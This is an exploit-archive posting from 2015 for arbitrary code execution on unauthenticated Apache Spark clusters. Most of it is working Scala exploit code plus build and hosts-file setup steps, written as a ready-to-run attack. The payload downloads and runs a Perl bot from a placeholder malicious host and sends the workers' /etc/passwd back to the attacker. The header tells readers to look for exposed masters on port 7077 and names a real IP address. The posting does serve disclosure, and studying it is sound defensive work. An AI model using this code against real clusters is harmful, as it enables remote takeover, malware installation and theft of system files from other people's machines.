Apache Spark Cluster 1.3.x Arbitrary Code Execution
Posted Apr 16, 2015
Authored by Akhil Das

Apache Spark Cluster version 1.3.x suffers from a code execution vulnerability.

tags | exploit, code execution
SHA-256 | fa52b7d291365e260eefbd50b902865d8d250fb29a92eebfc41a473b27334295

# Exploit Title: Arbitrary Code Execution in Apache Spark Cluster
# Date: 23/03/2015
# Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in
# Vendor Homepage: https://spark.apache.org/
# Software Link: https://spark.apache.org/downloads.html
# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)
# Tested on: 1.2.1

# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendell (@pwendell) for reviewing.
# Reference(s): http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/
# Exploit URL : https://github.com/akhld/spark-exploit/

# Spark clusters that are not secured behind a proper firewall can be taken
# over easily, since Spark has no authentication mechanism; this exploit
# simply runs arbitrary code on the cluster.
# All you have to do is find a vulnerable Spark cluster (the master usually
# listens on port 7077), add that host to your hosts file so that your system
# can resolve it (here it is spark-b-akhil-master pointing to 54.155.61.87 in
# my /etc/hosts, as sketched below), and submit a Spark job containing the
# arbitrary code you want to execute.
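
# For illustration only, assuming root access on the attacking machine, the
# hosts entry and build/launch sequence could look like the following (the
# sbt output path matches the jar name used in sc.addJar below):
#
#   echo "54.155.61.87   spark-b-akhil-master" | sudo tee -a /etc/hosts
#   sbt package    # builds target/scala-2.10/spark-exploit_2.10-1.0.jar
#   sbt run        # connects to the master and submits the job below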

# Language: Scala


import org.apache.spark.{SparkContext, SparkConf}
import scala.sys.process._ // provides the .! syntax used to run shell commands below

/**
 * Created by akhld on 23/3/15.
 */

object Exploit {
  def main(arg: Array[String]) {
    val sconf = new SparkConf()
      .setMaster("spark://spark-b-akhil-master:7077") // Set this to the vulnerable master URI
      .setAppName("Exploit")
      .set("spark.cores.max", "2")
      .set("spark.executor.memory", "2g")
      .set("spark.driver.host", "hacked.work") // Set this to the host you launch the attack from

    val sc = new SparkContext(sconf)
    // Ship this jar to the executors so the closure below can be deserialized there
    sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")

    // The body of this map runs on the cluster's executors, not on the driver
    val exploit = sc.parallelize(1 to 1).map(_ => {
      // Replace these with whatever you want to get executed
      val download = "wget https://mallicioushost/mal.pl -O bot.pl".!
      val run = "perl bot.pl".!
      scala.io.Source.fromFile("/etc/passwd").mkString
    })
    // Pull the result back to the driver and print each worker's /etc/passwd
    exploit.collect().foreach(println)
  }
}
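
For completeness, a minimal build.sbt sketch that would produce the jar name
referenced by sc.addJar above; the Scala and spark-core versions are
assumptions chosen to match the scala-2.10 output path and the tested 1.2.1
release:

// build.sbt (sketch; versions are assumptions)
name := "spark-exploit"

version := "1.0"

scalaVersion := "2.10.4"

libraryDependencies += "org.apache.spark" %% "spark-core" % "1.2.1"

Running the job executes the commands on one of the cluster's executors and
prints that machine's /etc/passwd back on the attacking driver via collect(),
confirming remote code execution.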




Thanks
Best Regards
